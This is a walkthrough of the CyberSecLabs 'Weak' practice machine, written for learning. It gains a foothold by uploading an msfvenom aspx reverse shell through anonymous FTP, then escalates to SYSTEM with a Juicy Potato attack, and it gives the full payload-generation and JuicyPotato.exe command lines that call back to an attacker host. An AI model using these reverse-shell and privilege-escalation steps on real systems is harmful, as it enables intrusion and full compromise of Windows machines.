CyberSecLabs Weak Walkthrough
RHOST = 172.31.1.11
LHOST = 172.21.1.1
Getting a Foothold
Weak is a windows machine which has port 80 open which shows an IIS welcome page.
It also has FTP anonymous login allowed, so we can upload an aspx reverse shell and execute using browser to get a shell back.
msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1
lport=443 -f aspx > shell.aspx
Privilege Escalation
Running whoami /priv we get SeImpersonatePrivilege token enabled
So we can perform Juicy Potato attack.
Running systeminfo we come to know it is a windows 7 machine
Ok so how to perform juicy potato attack?
In order to perform juicy potato attack we need few arguments
JuicyPotato.exe -l {Any_Port} -p {Program_To_Execute} -t * -c
{CLSID_Value}
For {Any_Port} we can litterally use any working port that is not blocked by the windows
For {Program_To_Execute} we can create a msfvenom exe reverse shell and execute it to get a shell back
For {CLSID_Value} we have to find the correct CLSID value from the list.
How to find CLSID_Value?
Download the CLSID list according to the operating system
Currently Following Operating System’s CLSID have been obtained
- Windows_10_Enterprise
- Windows_10_Pro
- Windows_7_Enterprise
- Windows_8.1_Enterprise
- Windows_Server_2008_R2_Enterprise
- Windows_Server_2012_Datacenter
- Windows_Server_2016_Standard
So for this scenario it is windows 7, so grab CLSID.list for windows 7 : Download Here
Next Download TestCLSID.bat file which would test all the CLSID’s from the CLSID.list we pass to it.
https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat
Now make sure to upload JuicyPotato.exe, TestCLSID.bat and CLSID.list to same folder in victim’s machine.
Then execute TestCLSID.bat in Terminal and let it run for 5 minutes.
It would start scanning CLSID’s from the CLSID.list and would store the output in result.log
Open the result.log and you should find many CLSID’s there
Select any one CLSID from this list, but make sure it is running with Higher Privileges (i.e: NT AUTHORITY\SYSTEM) and not running as the user.
JuicyPotato.exe -l {Any_Port} -p {Program_To_Execute} -t * -c
{CLSID_Value}
Now we have all the pieces that needs to placed
{Any_Port} = 1337
{Program_To_Execute} = shell.exe (Generated by msfvenom)
msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1
lport=443 -f exe -o shell.exe
{CLSID_Value} = 687e55ca-6621–4c41-b9f1-c0eddc94bb05
Execute
JuicyPotato.exe -l 1337 -p C:\Users\Public\Downloads\shell.exe -t * -c
{687e55ca-6621–4c41-b9f1-c0eddc94bb05}
And we Would get us a NT AUTHORITY shell on port 443
That’s it for this simple Walk through of an easy windows machine. I Hope you learned something out of it !